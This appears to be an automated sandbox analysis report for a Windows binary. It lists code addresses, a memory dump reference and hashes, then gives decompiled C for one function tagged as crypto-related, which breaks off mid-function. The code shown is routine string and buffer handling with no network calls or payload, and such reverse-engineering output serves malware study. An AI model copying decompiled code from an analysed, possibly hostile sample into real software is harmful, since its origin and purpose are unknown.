0x0040c71d
0x0040c722
0x0040c730
0x0040c635
0x0040c635
0x0040c636
0x0040c639
0x00000000
0x0040c63f
0x0040c643
0x0040c64f
0x0040c65b
0x0040c667
0x0040c673
0x0040c67f
0x0040c68b
0x0040c697
0x0040c6a3
0x0040c6a8
0x0040c6b6
0x0040c6b6
0x0040c639
0x00000000
0x0040c62f
0x0040c54a
0x0040c54c
0x0040c553
0x0040c558
0x0040c55b
0x0040c56e
0x0040c577
0x0040c583
0x0040c58f
0x0040c59b
0x0040c5a7
0x0040c5b3
0x0040c5bf
0x0040c5cb
0x0040c5d7
0x0040c5de
0x0040c5e1
0x0040c5e1
0x0040c5f0
0x0040c243
0x0040c24a
0x0040c256
0x0040c262
0x0040c26e
0x0040c27a
0x0040c286
0x0040c292
0x0040c29e
0x0040c2a3
0x0040c2b1
0x0040c2b1
0x0040c241
0x0040bea4
0x0040b83c
0x00000000
0x00000000
0x00000000
0x0040b317
0x0040b004
0x0040b00b
0x0040b017
0x0040b023
0x0040b036
0x0040b036
0x00000000

Strings

ZFhj, xrefs: 0040B588

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
Opcode ID: 1fd1a7cb2d6f462c35493964b4bf5c009624ed760406a2f51c01cf0a77b71e06
Instruction ID: 76f361cfe02ff67ebb96957e3dd623256662db1974cb7c269ff27bf8464856b8
Opcode Fuzzy Hash: 1fd1a7cb2d6f462c35493964b4bf5c009624ed760406a2f51c01cf0a77b71e06
Instruction Fuzzy Hash: 81E260326183909BC335EB75E892BEFB3E4AFD5318F404A2EE48953192EF345944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00423EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00423EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x43a24c; // 0xa0d0920
							_t550 =  *0x43a250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E00411030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E00411030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E00411030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E004110B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
														_t714 = _t714 + 1;
														if(_t714 < 0x7fffffff) {
															continue;
														} else {
															goto L80;
														}
														goto L81;
													}
													goto L270;
												}
											}
											goto L81;
										}
										asm("bsf esi, ecx");
										_t714 = _t714 + _t652;
										goto L270;
									} else {
										_t714 = 0;
										_t652 =  ~_t652 + 0x10;
										while( *((char*)(_t714 + _t505)) != 0) {
											_t714 = _t714 + 1;
											if(_t714 < _t652) {
												continue;
											} else {
												goto L74;
											}
											goto L81;
										}
										L270:
										if(_t714 == 0xffffffff && _t416 != 0) {
											 *_t416 = 0;
										}
									}
									L81:
									_t57 = _t714 + 1; // -2147483661
									_t654 =  <=  ? 0x40 : _t57;
									if(_t654 >  *(_t681 + 4)) {
										_v68 = (_t654 >> 5 >> 0x1a) + _t654 >> 6;
										_t655 = _t654 & 0x8000003f;
										if(_t655 < 0) {
											_t655 = (_t655 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t658 = _v68 + (0 | _t655 > 0x00000000) << 6;
										_v68 = _t658;
										_push(_t658);
										_t586 = E00411030();
										_t723 = _t723 + 4;
										_t659 =  *_t681;
										if(_t659 == 0) {
											 *_t586 = 0;
										} else {
											if(_t586 != 0) {
												_t479 =  *_t659;
												 *_t586 = _t479;
												if(_t479 != 0) {
													_v80 = _t681;
													_v84 = _t505;
													_t524 = 0;
													while(1) {
														_t524 = _t524 + 1;
														_t481 =  *((char*)(_t659 + _t524 * 2 - 1));
														 *((char*)(_t586 + _t524 * 2 - 1)) = _t481;
														if(_t481 == 0) {
															break;
														}
														_t482 =  *((char*)(_t659 + _t524 * 2));
														 *((char*)(_t586 + _t524 * 2)) = _t482;
														if(_t482 != 0) {
															continue;
														}
														break;
													}
													_t681 = _v80;
													_t505 = _v84;
												}
												_t659 =  *_t681;
											}
											_push(1);
											_push(_t659);
											_v76 = _t586;
											E004110B0();
											_t586 = _v76;
											_t723 = _t723 + 8;
										}
										 *(_t681 + 4) = _v68;
										 *_t681 = _t586;
									} else {
										_t586 =  *_t681;
									}
									if(_t586 != 0 && _t505 != 0) {
										_t660 = 0;
										while(1) {
											_t660 = _t660 + 1;
											_t477 =  *((char*)(_t660 + _t505 - 1));
											 *((char*)(_t660 + _t586 - 1)) = _t477;
											if(_t714 != 0 && _t660 == _t714) {
												break;
											}
											if(_t477 != 0) {
												continue;
											} else {
											}
											goto L117;
										}
										 *((char*)(_t660 + _t586)) = 0;
									}
								}
							}
							L117:
							_push(1);
							_push(_t505);
							E004110B0();
							_t723 = _t723 + 8;
							_t418 = _v40;
							_t552 =  *_t418;
						} while (_t552 > _v64);
						_t505 = _t418;
						_t604 = 0;
						_v48 = 0;
						asm("pxor xmm0, xmm0");
						if(_t552 <= 0) {
							if( &_v52 == _t505) {
								L288:
								_v52 = _t604;
								_v44 = _t604;
							} else {
								L287:
								_v44 = _t604;
								_v52 = _t604;
								 *_t505 = _t604;
								 *(_t505 + 8) = _t604;
								goto L196;
							}
						} else {
							_t371 = 0;
							_v44 = 0;
							_t682 = 0;
							_v60 = _t552;
							_v40 = _t505;
							do {
								_t682 = _t682 + 1;
								_t520 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t682 * 4 - 4));
								if(_t520 != 0) {
									_t704 = _t520 & 0x0000000f;
									if(_t704 == 0) {
										L125:
										asm("pxor xmm1, xmm1");
										_v56 = _t682;
										_t565 =  ~( ~_t704 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+esi]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb edi, xmm0");
											if(_t682 != 0) {
												break;
											}
											_t704 = _t704 + 0x10;
											if(_t704 < _t565) {
												continue;
											} else {
												_t682 = _v56;
												if(_t565 >= 0x7fffffff) {
													goto L131;
												} else {
													while( *((char*)(_t565 + _t520)) != 0) {
														_t565 = _t565 + 1;
														if(_t565 < 0x7fffffff) {
															continue;
														} else {
															goto L131;
														}
														goto L182;
													}
													goto L284;
												}
											}
											goto L182;
										}
										_t566 = _t682;
										asm("bsf ecx, ecx");
										_t682 = _v56;
										_t565 = _t566 + _t704;
										goto L284;
									} else {
										_t565 = 0;
										_t704 =  ~_t704 + 0x10;
										while( *((char*)(_t565 + _t520)) != 0) {
											_t565 = _t565 + 1;
											if(_t565 < _t704) {
												continue;
											} else {
												goto L125;
											}
											goto L182;
										}
										L284:
										if(_t565 != 0) {
											L131:
											_v52 = _t604;
											_t624 =  >  ? _t371 : 0;
											_t625 =  >=  ? _t371 : _t624;
											_v64 =  >=  ? _t371 : _t624;
											_t626 = _v44;
											if(_t371 == _t626) {
												_v44 = _t626 + 4;
												_push(0x10 + _t626 * 4);
												_t707 = E00411030();
												E00410C10(_t707, _v48, _v52 << 2);
												_push(4);
												_push(_v48);
												E004110B0();
												_t723 = _t723 + 0x18;
												_v48 = _t707;
												_t371 = _v52;
											}
											_t419 = _t371 != _v64;
											if(_t371 != _v64) {
												E00410BC0(_v48 + _v64 * 4 + 4, _v48 + _v64 * 4, _t419 << 2);
												_t723 = _t723 + 0xc;
											}
											_push(8);
											_t705 = E00411030();
											_t723 = _t723 + 4;
											if(_t705 == 0) {
												_t705 = 0;
											} else {
												 *_t705 = 0;
												 *(_t705 + 4) = 0;
												if(_t520 == 0 ||  *_t520 == 0) {
													_push(0x40);
													_v80 = E00411030();
													_t723 = _t723 + 4;
													_t431 =  *_t705;
													if(_t431 == 0) {
														 *_v80 = 0;
													} else {
														if(_v80 != 0) {
															_t568 = _v80;
															_t629 =  *_t431;
															 *_t568 = _t629;
															if(_t629 != 0) {
																_v56 = _t682;
																_t630 = 0;
																_t521 = _t568;
																while(1) {
																	_t630 = _t630 + 1;
																	_t569 =  *((char*)(_t431 + _t630 * 2 - 1));
																	 *((char*)(_t521 + _t630 * 2 - 1)) = _t569;
																	if(_t569 == 0) {
																		break;
																	}
																	_t570 =  *((char*)(_t431 + _t630 * 2));
																	 *((char*)(_t521 + _t630 * 2)) = _t570;
																	if(_t570 != 0) {
																		continue;
																	}
																	break;
																}
																_t682 = _v56;
															}
														}
														_push(1);
														_push(_t431);
														E004110B0();
														_t723 = _t723 + 8;
													}
													 *_t705 = _v80;
													 *(_t705 + 4) = 0x40;
												} else {
													_t436 = _t520 & 0x0000000f;
													if(_t436 == 0) {
														L142:
														asm("pxor xmm1, xmm1");
														_t636 =  ~( ~_t436 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v72 = _t636;
														_t571 = _t636;
														while(1) {
															asm("movdqu xmm0, [ebx+eax]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb edx, xmm0");
															if(_t636 != 0) {
																break;
															}
															_t436 = _t436 + 0x10;
															if(_t436 < _t571) {
																continue;
															} else {
																_v72 = _t571;
																if(_v72 >= 0x7fffffff) {
																	L149:
																	_v72 = 0x7fffffff;
																} else {
																	_t451 = _t571;
																	while( *((char*)(_t451 + _t520)) != 0) {
																		_t451 = _t451 + 1;
																		if(_t451 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L149;
																		}
																		goto L150;
																	}
																	_v72 = _t451;
																}
															}
															goto L150;
														}
														asm("bsf edx, edx");
														_v72 = _t636 + _t436;
													} else {
														_v72 = 0;
														_t646 = _v72;
														_t436 =  ~_t436 + 0x10;
														while( *((char*)(_t646 + _t520)) != 0) {
															_t646 = _t646 + 1;
															if(_t646 < _t436) {
																continue;
															} else {
																goto L142;
															}
															goto L150;
														}
														_v72 = _t646;
													}
													L150:
													_t143 = _v72 + 1; // 0x80000000
													_t573 =  <=  ? 0x40 : _t143;
													if(_t573 > 0) {
														_t442 = (_t573 >> 5 >> 0x1a) + _t573 >> 6;
														_v76 = _t442;
														_t574 = _t573 & 0x8000003f;
														if(_t574 < 0) {
															_t574 = (_t574 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t641 = _t442 + (0 | _t574 > 0x00000000) << 6;
														_v76 = _t641;
														_push(_t641);
														_t445 = E00411030();
														_v68 = _t445;
														_t723 = _t723 + 4;
														_t642 =  *_t705;
														if(_t642 == 0) {
															 *_t445 = 0;
														} else {
															if(_v68 != 0) {
																_t576 = _t445;
																_t449 =  *_t642;
																 *_t576 = _t449;
																if(_t449 != 0) {
																	_v84 = _t520;
																	_t450 = 0;
																	_v56 = _t682;
																	_t522 = _t576;
																	while(1) {
																		_t450 = _t450 + 1;
																		_t577 =  *((char*)(_t642 + _t450 * 2 - 1));
																		 *((char*)(_t522 + _t450 * 2 - 1)) = _t577;
																		if(_t577 == 0) {
																			break;
																		}
																		_t578 =  *((char*)(_t642 + _t450 * 2));
																		 *((char*)(_t522 + _t450 * 2)) = _t578;
																		if(_t578 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t520 = _v84;
																	_t682 = _v56;
																}
															}
															_push(1);
															_push(_t642);
															E004110B0();
															_t723 = _t723 + 8;
														}
														 *(_t705 + 4) = _v76;
														 *_t705 = _v68;
													} else {
														_v68 = 0;
													}
													if(_v68 != 0) {
														_v56 = _t682;
														_t447 = 0;
														_t575 = _v68;
														_t686 = _v72;
														while(1) {
															_t447 = _t447 + 1;
															_t644 =  *((char*)(_t447 + _t520 - 1));
															 *((char*)(_t447 + _t575 - 1)) = _t644;
															if(_t686 != 0 && _t447 == _t686) {
																break;
															}
															if(_t644 != 0) {
																continue;
															} else {
																_t682 = _v56;
															}
															goto L181;
														}
														_t682 = _v56;
														 *((char*)(_t447 + _v68)) = 0;
													}
												}
											}
											L181:
											 *((intOrPtr*)(_v48 + _v64 * 4)) = _t705;
											_t371 = _v52 + 1;
											_v60 =  *_v40;
											_t604 = _t371;
										} else {
										}
									}
								}
								L182:
							} while (_t682 < _v60);
							_t505 = _v40;
							_t683 =  &_v52;
							_t556 =  *(_t683 - 8);
							if(_t683 == _t505) {
								L253:
								_v52 = 0;
								_v44 = 0;
								_t604 = _v48;
								if(_t371 > 0) {
									_t675 = _t371 >> 1;
									if(_t675 == 0) {
										_t676 = 1;
									} else {
										_v40 = _t505;
										_t509 = _t371;
										_t694 = 0;
										do {
											_t532 =  *((intOrPtr*)(_t604 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + _t694 * 8)) != 0) {
												_push(1);
												E004187B0(_t532);
												_t604 = _v52;
											}
											_t533 =  *((intOrPtr*)(_t604 + 4 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + 4 + _t694 * 8)) != 0) {
												_push(1);
												E004187B0(_t533);
												_t604 = _v52;
											}
											_t694 = _t694 + 1;
										} while (_t694 < _t675);
										_t534 = _t694;
										_t371 = _t509;
										_t505 = _v40;
										_t333 = _t534 + 1; // 0x2
										_t676 = _t694 + _t333;
									}
									_t334 = _t676 - 1; // 0x1
									if(_t334 < _t371) {
										_t530 =  *((intOrPtr*)(_t604 + _t676 * 4 - 4));
										if( *((intOrPtr*)(_t604 + _t676 * 4 - 4)) != 0) {
											_push(1);
											E004187B0(_t530);
											_t604 = _v52;
										}
									}
								}
							} else {
								_v52 = _t604;
								 *_t505 = 0;
								 *(_t505 + 8) = 0;
								if(_t556 <= 0) {
									L196:
									_t605 =  *(_t505 + 4);
								} else {
									_t605 =  *(_t505 + 4);
									_t424 = _t556 >> 1;
									if(_t424 == 0) {
										_t425 = 1;
									} else {
										_v60 = _t556;
										_t685 = 0;
										_t702 = _t424;
										do {
											_t558 =  *((intOrPtr*)(_t605 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + _t685 * 8)) != 0) {
												_push(1);
												E004187B0(_t558);
												_t605 =  *(_t505 + 4);
											}
											_t559 =  *((intOrPtr*)(_t605 + 4 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + 4 + _t685 * 8)) != 0) {
												_push(1);
												E004187B0(_t559);
												_t605 =  *(_t505 + 4);
											}
											_t685 = _t685 + 1;
										} while (_t685 < _t702);
										_t556 = _v60;
										_t217 = _t685 + 1; // 0x2
										_t425 = _t685 + _t217;
									}
									_t218 = _t425 - 1; // 0x1
									if(_t218 < _t556) {
										_t557 =  *((intOrPtr*)(_t605 + _t425 * 4 - 4));
										if( *((intOrPtr*)(_t605 + _t425 * 4 - 4)) != 0) {
											_push(1);
											E004187B0(_t557);
											goto L196;
										}
									}
								}
								_push(4);
								_push(_t605);
								E004110B0();
								_t723 = _t723 + 8;
								_t527 = _v52;
								 *(_t505 + 4) = 0;
								if(_t527 != 0) {
									_t672 = (_t527 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t527 - 0x00000001 & 0xfffffffc;
									_push(0x10 + _t672 * 4);
									 *(_t505 + 8) = _t672 + 4;
									_t368 = E00411030();
									_t723 = _t723 + 4;
									_t610 = _v52;
									 *(_t505 + 4) = _t368;
									 *_t505 = _t610;
									if(_t610 <= 0) {
										goto L198;
									} else {
										_v40 = _t505;
										_t673 = 0;
										asm("pxor xmm0, xmm0");
										do {
											_push(8);
											_t673 = _t673 + 1;
											_t693 = E00411030();
											_t723 = _t723 + 4;
											if(_t693 == 0) {
												_t693 = 0;
												_t508 = _t673 * 4;
											} else {
												_t376 = _t673 - 1;
												if(_t376 < 0 || _t376 >= _v52) {
													_t377 = 0;
													_t508 = _t673 * 4;
												} else {
													_t508 = _t673 * 4;
													_t377 =  *(_v48 + _t508 - 4);
												}
												 *_t693 = 0;
												 *(_t693 + 4) = 0;
												_t614 =  *_t377;
												if(_t614 == 0 ||  *_t614 == 0) {
													_push(0x40);
													_t378 = E00411030();
													_v84 = _t378;
													_t723 = _t723 + 4;
													_t615 =  *_t693;
													if(_t615 == 0) {
														 *_t378 = 0;
													} else {
														if(_v84 != 0) {
															_t535 = _t378;
															_t381 =  *_t615;
															 *_t535 = _t381;
															if(_t381 != 0) {
																_v56 = _t693;
																_t382 = 0;
																_v64 = _t673;
																_t695 = _t535;
																while(1) {
																	_t382 = _t382 + 1;
																	_t548 =  *((char*)(_t615 + _t382 * 2 - 1));
																	 *((char*)(_t695 + _t382 * 2 - 1)) = _t548;
																	if(_t548 == 0) {
																		break;
																	}
																	_t549 =  *((char*)(_t615 + _t382 * 2));
																	 *((char*)(_t695 + _t382 * 2)) = _t549;
																	if(_t549 != 0) {
																		continue;
																	}
																	break;
																}
																_t693 = _v56;
																_t673 = _v64;
															}
														}
														_push(1);
														_push(_t615);
														E004110B0();
														_t723 = _t723 + 8;
													}
													 *_t693 = _v84;
													 *(_t693 + 4) = 0x40;
												} else {
													_t537 = _t614 & 0x0000000f;
													if(_t537 == 0) {
														L212:
														asm("pxor xmm1, xmm1");
														_t388 =  ~( ~_t537 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v60 = _t388;
														_v64 = _t673;
														_t677 = _t388;
														while(1) {
															asm("movdqu xmm0, [edx+ecx]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb eax, xmm0");
															if(_t388 != 0) {
																break;
															}
															_t537 = _t537 + 0x10;
															if(_t537 < _t677) {
																continue;
															} else {
																_v60 = _t677;
																_t673 = _v64;
																if(_v60 >= 0x7fffffff) {
																	L219:
																	_v60 = 0x7fffffff;
																} else {
																	_t407 = _v60;
																	while( *((char*)(_t407 + _t614)) != 0) {
																		_t407 = _t407 + 1;
																		if(_t407 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L219;
																		}
																		goto L220;
																	}
																	goto L279;
																}
															}
															goto L220;
														}
														asm("bsf eax, eax");
														_t673 = _v64;
														_v60 = _t388 + _t537;
													} else {
														_v60 = 0;
														_t407 = _v60;
														_t537 =  ~_t537 + 0x10;
														while( *((char*)(_t407 + _t614)) != 0) {
															_t407 = _t407 + 1;
															if(_t407 < _t537) {
																continue;
															} else {
																goto L212;
															}
															goto L220;
														}
														L279:
														_v60 = _t407;
													}
													L220:
													_t392 =  <=  ? 0x40 : _v60 + 1;
													if(_t392 > 0) {
														_t543 = (_t392 >> 5 >> 0x1a) + _t392 >> 6;
														_v72 = _t543;
														_t393 = _t392 & 0x8000003f;
														if(_t393 < 0) {
															_t393 = (_t393 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t545 = _t543 + (0 | _t393 > 0x00000000) << 6;
														_v72 = _t545;
														_push(_t545);
														_v76 = _t614;
														_t396 = E00411030();
														_t614 = _v76;
														_t546 = _t396;
														_t723 = _t723 + 4;
														_t397 =  *_t693;
														_v68 = _t397;
														if(_t397 == 0) {
															 *_t546 = 0;
														} else {
															if(_t546 != 0) {
																_t403 =  *_t397;
																 *_t546 = _t403;
																if(_t403 != 0) {
																	_v56 = _t693;
																	_t404 = 0;
